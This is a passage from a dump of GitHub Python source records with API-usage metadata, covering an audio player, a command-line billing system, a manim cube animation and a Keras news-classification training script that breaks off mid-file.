"indico.modules.logs.models.entries.LogKind.negative", "line_number": 56, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.LogKind", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 57, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.logger.info", "line_number": 59, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.logger", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 63, 
"usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 63, "usage_type": "name"}, {"api_name": "werkzeug.exceptions.BadRequest", "line_number": 65, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormItemType.section_pd", "line_number": 66, "usage_type": "attribute"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormItemType", "line_number": 66, "usage_type": "name"}, {"api_name": "werkzeug.exceptions.BadRequest", "line_number": 67, "usage_type": "name"}, {"api_name": "indico.core.db.db.session.flush", "line_number": 69, "usage_type": "call"}, {"api_name": "indico.core.db.db.session", "line_number": 69, "usage_type": "attribute"}, {"api_name": "indico.core.db.db", "line_number": 69, "usage_type": "name"}, {"api_name": "indico.modules.logs.util.make_diff_log", "line_number": 70, "usage_type": "call"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm.management", "line_number": 76, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm", "line_number": 76, "usage_type": "name"}, {"api_name": "indico.modules.logs.models.entries.LogKind.change", "line_number": 76, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.LogKind", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 77, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 77, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.logger.info", "line_number": 80, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.logger", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormItemType.section_pd", "line_number": 89, "usage_type": "attribute"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormItemType", "line_number": 89, "usage_type": "name"}, {"api_name": "werkzeug.exceptions.BadRequest", "line_number": 90, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.util.update_regform_item_positions", "line_number": 92, "usage_type": "call"}, {"api_name": "indico.core.db.db.session.flush", "line_number": 93, "usage_type": "call"}, {"api_name": "indico.core.db.db.session", "line_number": 93, "usage_type": "attribute"}, {"api_name": "indico.core.db.db", "line_number": 93, "usage_type": "name"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm.management", "line_number": 96, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm", "line_number": 96, "usage_type": "name"}, {"api_name": "indico.modules.logs.models.entries.LogKind.positive", "line_number": 96, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.LogKind", "line_number": 96, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 97, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 97, "usage_type": "name"}, {"api_name": 
"indico.modules.events.registration.logger.info", "line_number": 99, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.logger", "line_number": 99, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 99, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 99, "usage_type": "name"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm.management", "line_number": 102, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm", "line_number": 102, "usage_type": "name"}, {"api_name": "indico.modules.logs.models.entries.LogKind.negative", "line_number": 102, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.LogKind", "line_number": 102, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 103, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 103, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.logger.info", "line_number": 105, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.logger", "line_number": 105, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 105, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 105, "usage_type": "name"}, {"api_name": "indico.web.util.jsonify_data", "line_number": 106, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.util.get_flat_section_positions_setup_data", "line_number": 107, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 114, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 114, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 117, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormSection.query.filter_by", "line_number": 129, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormSection.query", "line_number": 129, "usage_type": "attribute"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormSection", "line_number": 129, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormSection.position", "line_number": 131, "usage_type": "attribute"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormSection", "line_number": 131, "usage_type": "name"}, {"api_name": "indico.core.db.db.session.flush", "line_number": 136, "usage_type": "call"}, {"api_name": "indico.core.db.db.session", "line_number": 136, "usage_type": "attribute"}, {"api_name": "indico.core.db.db", "line_number": 136, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 137, "usage_type": "call"}]}
+{"seq_id": "73789106008", "text": "from multiprocessing import Process, Queue\nimport queue\nimport librosa\nimport pyaudio\nimport numpy\nfrom threading import Thread\nimport time\n\n# Audio is played in a separate process to ensure that playback is not impacted\n# by the UI. If audio is played from the same process as the UI, certain expensive operations\n# (like zooming in on the waveform) can cause the playback to stutter.\n\n# AudioState is the state required by the audio system to play audio.\nclass AudioState:\n def __init__(self, data = None, sampling_rate = None, play_rate = None):\n # This object can get quite big. If that's a problem, we'll instead transmit the filename.\n # In that case, the audio process will need to be responsible for modifications, e.g. play rate.\n self.data = data \n self.sampling_rate = sampling_rate\n self.play_rate = play_rate\n\nclass PlayAudioCommand:\n TYPE = \"play\"\n\n def __init__(self, start_timestamp, end_timestamp, current_timestamp, loop = True):\n self.start_timestamp = start_timestamp\n self.end_timestamp = end_timestamp\n self.current_timestamp = current_timestamp\n self.loop = loop\n\n def type(self):\n return PlayAudioCommand.TYPE\n\nclass StopAudioCommand:\n TYPE = \"stop\"\n\n def type(self):\n return StopAudioCommand.TYPE\n\nclass RestartAudioCommand:\n TYPE = \"restart\"\n\n def type(self):\n return RestartAudioCommand.TYPE\n\n# PlaybackState is the state of active audio playback which can be sent from the audio process back to the GUI process\n# for UI purposes.\nclass PlaybackState:\n def __init__(self, timestamp, playing):\n self.timestamp = timestamp\n\n # This is needed so that the audio process can communicate that audio has stopped playing, e.g.\n # when it reaches the end of the loop but looping is disabled.\n self.playing = playing\n\nclass AudioPlayer:\n\n def __init__(self):\n # The audio state queue is only ever written to by the GUI process and only ever read from\n # by the audio process to determine the state necessary to play audio.\n self.audio_state_queue = Queue()\n\n # The audio command queue is used by the GUI process to tell the audio process to play, stop,\n # etc. the audio.\n self.audio_command_queue = Queue()\n\n # The playback state queue is only ever written to by the audio process and only ever read from\n # by the GUI process to update the UI based on audio playback, e.g. move the cursor based on the \n # playback timestamp.\n self.playback_state_queue = Queue()\n\n # These values are set by the GUI process, and will eventually be propagated to the audio process.\n # There's no guarantee that these values are the same values currently being used by the audio\n # process. \n self.audio_state = None\n self.start_timestamp = None\n self.end_timestamp = None\n\n # This value can be set by the GUI process. 
Its value will be propagated to the audio process when audio playback begins.\n # While audio playback is occurring, this value will be updated by the audio process.\n self.current_timestamp = None\n\n self.ready = False\n self.playing = False\n self.loop = True\n\n def start(self):\n p = Process(target=audio_process, args=(self.audio_state_queue, self.audio_command_queue, self.playback_state_queue))\n p.start()\n\n t = Thread(target=self._playback_state_worker, args=[])\n t.start()\n\n def _playback_state_worker(self):\n while True:\n playback_state = get_if_present(self.playback_state_queue)\n if playback_state != None:\n if self.playing and not playback_state.playing:\n self.playing = False\n self.current_timestamp = playback_state.timestamp\n time.sleep(0.02)\n\n def set_audio_state(self, data, sampling_rate, play_rate):\n self.audio_state = AudioState(data, sampling_rate, play_rate)\n self.start_timestamp = 0.0\n self.end_timestamp = librosa.get_duration(y=data, sr=sampling_rate) * play_rate\n self.current_timestamp = 0.0\n self.ready = True\n self.audio_state_queue.put(self.audio_state)\n\n def set_start_timestamp(self, start_timestamp):\n self.start_timestamp = start_timestamp\n self._clamp_current_timestamp()\n\n def set_end_timestamp(self, end_timestamp):\n self.end_timestamp = end_timestamp\n self._clamp_current_timestamp()\n\n def set_current_timestamp(self, current_timestamp):\n self.current_timestamp = current_timestamp\n self._clamp_current_timestamp()\n\n def set_loop(self, loop):\n self.loop = loop\n\n def _clamp_current_timestamp(self):\n if self.current_timestamp < self.start_timestamp:\n self.current_timestamp = self.start_timestamp\n if self.current_timestamp > self.end_timestamp:\n self.current_timestamp = self.end_timestamp\n\n def play(self):\n # These should probably be synchronized in some way, but it will be safe as long as \n # AudioPlayer is only accessed from a single thread.\n self.playing = True\n self.audio_command_queue.put(PlayAudioCommand(self.start_timestamp, self.end_timestamp, self.current_timestamp, self.loop))\n\n def stop(self):\n self.playing = False\n self.audio_command_queue.put(StopAudioCommand())\n\n def restart(self):\n self.audio_command_queue.put(RestartAudioCommand())\n\ndef audio_process(audio_state_queue: Queue, audio_command_queue: Queue, playback_state_queue: Queue):\n\n stream = None\n audio_state = None\n\n p = pyaudio.PyAudio()\n while True:\n command = get_if_present(audio_command_queue)\n if command is not None and audio_state is not None:\n if command.type() == StopAudioCommand.TYPE:\n if stream is not None:\n stream.close()\n stream = None\n if command.type() == RestartAudioCommand.TYPE:\n if stream is not None:\n stream.close()\n stream = play_internal(\n p, \n playback_state_queue, \n command.start_timestamp, \n command.end_timestamp, \n command.current_timestamp, \n audio_state,\n )\n if command.type() == PlayAudioCommand.TYPE:\n stream = play_internal(\n p, \n playback_state_queue, \n command.start_timestamp, \n command.end_timestamp, \n command.current_timestamp, \n command.loop,\n audio_state,\n )\n update = get_if_present(audio_state_queue)\n if update is not None:\n audio_state = update\n p.terminate()\n\ndef get_if_present(q):\n try:\n return q.get_nowait()\n except queue.Empty:\n return None\n\ndef play_internal(p, playback_queue, start_timestamp, end_timestamp, current_timestamp, loop, audio_state):\n current_frame = librosa.time_to_samples(current_timestamp / audio_state.play_rate, sr=audio_state.sampling_rate)\n def 
pyaudio_callback(in_data, frame_count, time_info, status):\n nonlocal audio_state, start_timestamp, end_timestamp, current_timestamp, current_frame\n start_frame = librosa.time_to_samples(start_timestamp / audio_state.play_rate, sr=audio_state.sampling_rate)\n if current_frame < start_frame:\n # a bit hacky, we can't have other classes write to current_frame while music is playing\n # but we want to ensure that it's updated if e.g. the loop shifts\n current_frame = start_frame\n end_frame = librosa.time_to_samples(end_timestamp / audio_state.play_rate, sr=audio_state.sampling_rate)\n (data, current_frame) = extract_audio_data(audio_state.data, start_frame, end_frame, current_frame, frame_count, loop)\n current_timestamp = librosa.samples_to_time(current_frame, sr=audio_state.sampling_rate) * audio_state.play_rate\n if current_frame >= end_frame:\n playback_queue.put(PlaybackState(start_timestamp, False))\n elif playback_queue.empty():\n playback_queue.put(PlaybackState(current_timestamp, True))\n status = pyaudio.paContinue\n return (data, status)\n stream = p.open(rate=audio_state.sampling_rate, channels=len(audio_state.data.shape), format=pyaudio.paFloat32, output=True, stream_callback=pyaudio_callback)\n return stream\n\ndef extract_audio_data(data, start_frame, end_frame, current_frame, frame_count, loop):\n if len(data.shape) == 1:\n return extract_audio_data_mono(data, start_frame, end_frame, current_frame, frame_count, loop)\n else:\n (left, _) = extract_audio_data_mono(data[0], start_frame, end_frame, current_frame, frame_count, loop)\n (right, current_frame) = extract_audio_data_mono(data[1], start_frame, end_frame, current_frame, frame_count, loop)\n result = numpy.empty((left.size + right.size,), dtype=left.dtype)\n result[0::2] = left\n result[1::2] = right\n return (result, current_frame)\n\ndef extract_audio_data_mono(data, start_frame, end_frame, current_frame, frame_count, loop):\n new_start_frame = current_frame + frame_count\n extracted_data = []\n if end_frame != None and new_start_frame >= end_frame:\n if loop:\n extracted_data = numpy.concatenate((data[current_frame:end_frame], data[start_frame:(start_frame + new_start_frame - end_frame)]))\n current_frame = start_frame + new_start_frame - end_frame\n else:\n extracted_data = data[current_frame:end_frame]\n current_frame = end_frame\n else:\n extracted_data = data[current_frame:new_start_frame]\n current_frame += frame_count\n return (extracted_data, current_frame)", "repo_name": "athorwall/noodler", "sub_path": "noodler/audio/audio.py", "file_name": "audio.py", "file_ext": "py", "file_size_in_byte": 10030, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "multiprocessing.Queue", "line_number": 61, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 65, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 70, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 88, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 91, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 101, "usage_type": "call"}, {"api_name": "librosa.get_duration", "line_number": 106, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 145, "usage_type": "name"}, {"api_name": "pyaudio.PyAudio", "line_number": 150, "usage_type": "call"}, {"api_name": "queue.Empty", "line_number": 187, "usage_type": "attribute"}, {"api_name": 
"librosa.time_to_samples", "line_number": 191, "usage_type": "call"}, {"api_name": "librosa.time_to_samples", "line_number": 194, "usage_type": "call"}, {"api_name": "librosa.time_to_samples", "line_number": 199, "usage_type": "call"}, {"api_name": "librosa.samples_to_time", "line_number": 201, "usage_type": "call"}, {"api_name": "pyaudio.paContinue", "line_number": 206, "usage_type": "attribute"}, {"api_name": "pyaudio.paFloat32", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 227, "usage_type": "call"}]}
+{"seq_id": "11542271431", "text": "import os, json\r\nfrom datetime import datetime\r\ntry:\r\n from prettytable import PrettyTable\r\nexcept:\r\n os.system(\"python -m pip install -U prettytable\")\r\n\r\nclass Billing_System:\r\n def __init__(self):\r\n self.merchant_name = \"Supermarket\"\r\n self.carrybag_price = 10\r\n self.tax = 9\r\n self.store = json.load(open(\"./products.json\", \"r+\"))[\"products\"] \r\n \r\n def banner(self):\r\n os.system(f'cls & mode 140,24 && title Billing System ~ github.com/ISROHarsh' if os.name == \"nt\" else \"clear\")\r\n print('''\r\n \\t\\t\\t\\x1b[31m▄▄▄▄· \\x1b[0m▪ ▄▄▌ ▄▄▌ ▪ ▐ ▄ ▄▄ • \\x1b[31m.▄▄ · \\x1b[0m ▄· ▄▌.▄▄ · ▄▄▄▄▄▄▄▄ .• ▌ ▄ ·. \r\n \\t\\t\\t\\x1b[31m▐█ ▀█▪\\x1b[0m██ ██• ██• ██ •█▌▐█▐█ ▀ ▪ \\x1b[31m▐█ ▀. \\x1b[0m▐█▪██▌▐█ ▀. •██ ▀▄.▀··██ ▐███▪\r\n \\t\\t\\t\\x1b[31m▐█▀▀█▄\\x1b[0m▐█·██▪ ██▪ ▐█·▐█▐▐▌▄█ ▀█▄ \\x1b[31m▄▀▀▀█▄\\x1b[0m▐█▌▐█▪▄▀▀▀█▄ ▐█.▪▐▀▀▪▄▐█ ▌▐▌▐█·\r\n \\t\\t\\t\\x1b[31m██▄▪▐█\\x1b[0m▐█▌▐█▌▐▌▐█▌▐▌▐█▌██▐█▌▐█▄▪▐█ \\x1b[31m▐█▄▪▐█\\x1b[0m ▐█▀·.▐█▄▪▐█ ▐█▌·▐█▄▄▌██ ██▌▐█▌\r\n \\t\\t\\t\\x1b[31m·▀▀▀▀ \\x1b[0m▀▀▀.▀▀▀ .▀▀▀ ▀▀▀▀▀ █▪·▀▀▀▀ \\x1b[31m ▀▀▀▀ \\x1b[0m ▀ • ▀▀▀▀ ▀▀▀ ▀▀▀ ▀▀ █▪▀▀▀\r\n ''')\r\n \r\n def menu(self):\r\n print('''\\n\\n\r\n\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Main menu\r\n\\u001b[0m[\\x1b[\\x1b[38;5;63m1\\u001b[0m] Show items\r\n\\u001b[0m[\\x1b[\\x1b[38;5;63m2\\u001b[0m] Sale\r\n\\u001b[0m[\\x1b[\\x1b[38;5;63m3\\u001b[0m] Exit''')\r\n try:\r\n choice = int(input('''\r\n\\u001b[0m[\\x1b[\\x1b[38;5;63m?\\u001b[0m] Choice> '''))\r\n if choice == 1:\r\n self.show_items()\r\n elif choice == 2:\r\n self.sale()\r\n elif choice == 3:\r\n quit()\r\n else:\r\n print(f\"[\\x1b[31m!\\x1b[0m] Please enter a valid choice (1,2,3)\")\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.menu()\r\n except Exception as e:\r\n print(f\"[\\x1b[31m!\\x1b[0m] {e.args}\")\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.menu()\r\n \r\n def add_items(self):\r\n while True:\r\n try:\r\n product_name = input('\\u001b[0m[\\x1b[\\x1b[38;5;63m*\\u001b[0m] Product name> ')\r\n if not product_name:\r\n with open(\"./products.json\", \"r+\") as db:\r\n data = json.load(db)\r\n data[\"products\"].append(product_data)\r\n db.seek(0)\r\n json.dump(data, db, indent = 4)\r\n break\r\n product_id = int(self.store[-1][\"product_id\"])\r\n product_price = int(input('\\u001b[0m[\\x1b[\\x1b[38;5;63m*\\u001b[0m] Product price> '))\r\n product_id += 1\r\n product_data = {\"product_id\": product_id, \"name\": product_name, \"price\": product_price}\r\n except KeyboardInterrupt:\r\n self.banner()\r\n self.menu()\r\n except Exception as e:\r\n print(f\"\\n[\\x1b[31m!\\x1b[0m] {e.args}\")\r\n input(f'\\n\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.show_items()\r\n \r\n def show_items(self):\r\n try:\r\n self.banner()\r\n self.store = json.load(open(\"./products.json\", \"r+\"))[\"products\"]\r\n products = PrettyTable(padding_width=5)\r\n products.field_names = [\"Product id\", \"Item name\", \"Price (Rs)\"]\r\n for i in range(len(self.store)):\r\n products.add_row([self.store[i]['product_id'], self.store[i]['name'], self.store[i]['price']])\r\n print(products)\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ENTER to add new items or CTRL+C to return main menu')\r\n self.add_items()\r\n except KeyboardInterrupt:\r\n self.banner()\r\n self.menu()\r\n 
input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.menu()\r\n\r\n def sale(self):\r\n self.banner()\r\n try:\r\n print('\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Customer details')\r\n print('\\u001b[0m[\\x1b[\\x1b[38;5;63m>\\u001b[0m] Use CTRL+C to return main menu')\r\n self.customer_name = input('\\u001b[0m[\\x1b[\\x1b[38;5;63m+\\u001b[0m] Customer name> ')\r\n if not self.customer_name:\r\n print(f\"[\\x1b[31m!\\x1b[0m] Customer name cannot be empty\")\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.sale()\r\n self.mobile_number = int(input('\\u001b[0m[\\x1b[\\x1b[38;5;63m+\\u001b[0m] Mobile number> '))\r\n if len(str(self.mobile_number)) < 10 or len(str(self.mobile_number)) > 10:\r\n print(f\"[\\x1b[31m!\\x1b[0m] Enter 10 digit mobile number\")\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.sale()\r\n self.address = input('\\u001b[0m[\\x1b[\\x1b[38;5;63m+\\u001b[0m] Address> ')\r\n if not self.address:\r\n print(f\"[\\x1b[31m!\\x1b[0m] Address cannot be empty\")\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.sale()\r\n self.bag = input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m+\\u001b[0m] Carry bag Rs {self.carrybag_price} (Y/n)> ').upper()\r\n if self.bag not in [\"Y\", \"N\", \"YES\", \"NO\"]:\r\n print(f\"[\\x1b[31m!\\x1b[0m] Please enter a valid choice (Y/n)\")\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.sale()\r\n self.invoice()\r\n except KeyboardInterrupt:\r\n self.banner()\r\n self.menu()\r\n except Exception as e:\r\n print(f\"[\\x1b[31m!\\x1b[0m] {e.args}\")\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.sale()\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to return main menu')\r\n self.banner()\r\n self.menu() \r\n \r\n def invoice(self):\r\n self.banner()\r\n print('\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Invoice')\r\n print('\\u001b[0m[\\x1b[\\x1b[38;5;63m>\\u001b[0m] Press ANY KEY when done')\r\n serial_no = 1\r\n invoice = PrettyTable(padding_width=3)\r\n invoice.field_names = [\"Serial No\", \"Item\", \"Quantity (Kg)\", \"Price\"]\r\n total = 0\r\n if self.bag:\r\n total += self.carrybag_price\r\n while True:\r\n try:\r\n product_id = input('\\u001b[0m[\\x1b[\\x1b[38;5;63m*\\u001b[0m] Product id> ')\r\n dtime = datetime.now().strftime(\"%d %b %Y At %I:%M %p\")\r\n if not product_id:\r\n self.banner()\r\n out = f'''\r\n+---------------+-----------+-------------------+-------------+\r\n\\t\\t\\t\\t\\t\\t{self.merchant_name} \r\n+---------------+-----------+-------------------+-------------+\r\n > Customer name: {self.customer_name} \r\n > Phone number: {self.mobile_number} \r\n > Address: {self.address} \r\n > Carry-bag opted: {self.bag}\r\n > Date: {dtime}\r\n{str(invoice)}\r\n +---------------+-----------+------------------+--------------+\r\n | | Total | Rs {total}\r\n | | GST | Rs {round(self.tax/100*total)}\r\n | | Grand Total | Rs {total + round(self.tax/100*total)}\r\n+---------------+-----------+-------------------+--------------+\r\n ''' \r\n print(out)\r\n with open(f\"invoice-{datetime.now().strftime('%d%m%y%H%M')}.txt\", \"a+\") as invoice_file:\r\n invoice_file.write(out)\r\n break\r\n quantity = input('\\u001b[0m[\\x1b[\\x1b[38;5;63m*\\u001b[0m] Quantity> ')\r\n 
total += self.store[int(product_id)][\"price\"] * int(quantity)\r\n invoice.add_row([serial_no, self.store[int(product_id)]['name'], quantity, self.store[int(product_id)]['price'] * int(quantity)])\r\n serial_no += 1\r\n except Exception as e:\r\n print(f\"[\\x1b[31m!\\x1b[0m] {e.args}\")\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to return main menu')\r\n self.banner()\r\n self.invoice()\r\n \r\nif __name__ == \"__main__\":\r\n client = Billing_System()\r\n client.banner()\r\n client.menu()\r\n", "repo_name": "ISROHarsh/Billing-system", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 9442, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.system", "line_number": 6, "usage_type": "call"}, {"api_name": "json.load", "line_number": 13, "usage_type": "call"}, {"api_name": "os.system", "line_number": 16, "usage_type": "call"}, {"api_name": "os.name", "line_number": 16, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 57, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 60, "usage_type": "call"}, {"api_name": "json.load", "line_number": 78, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 79, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 140, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 148, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 148, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 168, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 168, "usage_type": "name"}]}
+{"seq_id": "5098543207", "text": "from manim.animation.animation import Animation\nfrom manim.constants import PI\nfrom manim.mobject.types.vectorized_mobject import VGroup\nfrom .cube_utils import get_axis_from_face\n\nclass CubeMove(Animation):\n def __init__(self, mobject, face, **kwargs):\n self.axis = get_axis_from_face(face[0])\n self.face = face\n self.angle = PI/2 if (\"R\" in face or \"F\" in face or \"D\" in face) else -PI/2\n self.angle = self.angle if \"2\" not in face else self.angle*2\n self.angle = -self.angle if \"'\" in face else self.angle\n super().__init__(mobject, **kwargs)\n\n def create_starting_mobject(self):\n starting_mobject = self.mobject.copy()\n if starting_mobject.indices == {}:\n starting_mobject.set_indices()\n return starting_mobject\n\n def interpolate_mobject(self, alpha):\n self.mobject.become(self.starting_mobject)\n \n VGroup(*self.mobject.get_face(self.face[0])).rotate(\n alpha * self.angle,\n self.axis\n )\n\n def finish(self):\n super().finish()\n self.mobject.adjust_indices(self.mobject.get_face(self.face[0], False))", "repo_name": "WampyCakes/manim-rubikscube", "sub_path": "manim_rubikscube/cube_animations.py", "file_name": "cube_animations.py", "file_ext": "py", "file_size_in_byte": 1151, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 41, "dataset": "github-code", "pt": "32", "api": [{"api_name": "manim.animation.animation.Animation", "line_number": 6, "usage_type": "name"}, {"api_name": "cube_utils.get_axis_from_face", "line_number": 8, "usage_type": "call"}, {"api_name": "manim.constants.PI", "line_number": 10, "usage_type": "name"}, {"api_name": "manim.mobject.types.vectorized_mobject.VGroup", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "74870470492", "text": "import numpy as np\nimport tensorflow as tf\nimport pandas as pd\nimport pickle\nimport shutil\n\nfrom tensorflow import keras\nfrom sklearn.model_selection import train_test_split\nfrom preprocessor import PreProcessor\nfrom os import mkdir\nfrom os.path import join, normpath, dirname\nfrom sklearn import metrics\n\nREMOVE_PREVIOUS_MODEL = True\nMODEL_OUTPUT_DIR = normpath(join(dirname(__file__), '../model/'))\nDATA_SET_FILE = normpath(join(dirname(__file__), '../data/simple_data/labeled_news.csv'))\nMODEL_FILE = normpath(join(dirname(__file__), '../model/keras_model.h5'))\nTOKEN_FILE = normpath(join(dirname(__file__), '../model/tokenizer'))\nVARS_FILE = normpath(join(dirname(__file__), '../model/vars'))\n\nMAX_DOCUMENT_LENGTH = 200\nVOCAB_SIZE = 20000\nEMBED_DIM = 50\nN_CLASSES = 8\n\nLSTM_LAYERS = 100\nFILTER_SIZE = 64\nPOOL_SIZE = 4\n\nif REMOVE_PREVIOUS_MODEL:\n # Remove old model\n shutil.rmtree(MODEL_OUTPUT_DIR)\n mkdir(MODEL_OUTPUT_DIR)\n\n# read data\ndf = pd.read_csv(DATA_SET_FILE, header=None)\nX, y = df[1], df[0]\n\n# class range from 0 ~ N_CLASSES-1\ny = y.apply(lambda x: x-1)\n# preprocess\nX = X.apply(lambda x: PreProcessor.clean_text(x))\n\n# split train and test data\nx_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)\n\n# tokenizer\ntokenizer = tf.keras.preprocessing.text.Tokenizer(num_words=VOCAB_SIZE)\ntokenizer.fit_on_texts(x_train)\n\nx_train = tokenizer.texts_to_sequences(x_train)\nx_test = tokenizer.texts_to_sequences(x_test)\n\nx_train = tf.keras.preprocessing.sequence.pad_sequences(x_train, maxlen=MAX_DOCUMENT_LENGTH)\nx_test = tf.keras.preprocessing.sequence.pad_sequences(x_test, maxlen=MAX_DOCUMENT_LENGTH)\n\n# save tokenizer\nwith open(TOKEN_FILE, 'wb') as handle:\n pickle.dump(tokenizer, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n# save vocab size\nwith open(VARS_FILE, 'wb') as handle:\n vars = {\n 'MAX_DOCUMENT_LENGTH': MAX_DOCUMENT_LENGTH,\n 'VOCAB_SIZE': VOCAB_SIZE,\n 'EMBED_DIM': EMBED_DIM,\n 'N_CLASSES': N_CLASSES\n }\n pickle.dump(vars, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nmodel = keras.Sequential()\nmodel.add(keras.layers.Embedding(VOCAB_SIZE, EMBED_DIM, input_length=MAX_DOCUMENT_LENGTH))\nmodel.add(keras.layers.Conv1D(FILTER_SIZE, EMBED_DIM, activation='relu'))\nmodel.add(keras.layers.MaxPooling1D(pool_size=POOL_SIZE))\nmodel.add(keras.layers.LSTM(LSTM_LAYERS, dropout=0.2, recurrent_dropout=0.2))\nmodel.add(keras.layers.Dense(N_CLASSES, 